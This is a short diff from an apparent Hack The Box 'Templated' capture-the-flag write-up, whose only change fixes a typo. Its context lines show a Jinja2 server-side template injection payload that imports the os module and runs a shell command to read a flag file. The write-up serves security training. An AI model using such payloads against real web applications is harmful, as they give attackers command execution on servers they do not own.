ElliottDG/Cyber-Write-Ups/HTB/Templated/Templated.md

 {{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
 ```

-which will return a flag where the page name normall is.
+which will return a flag where the page name normally is.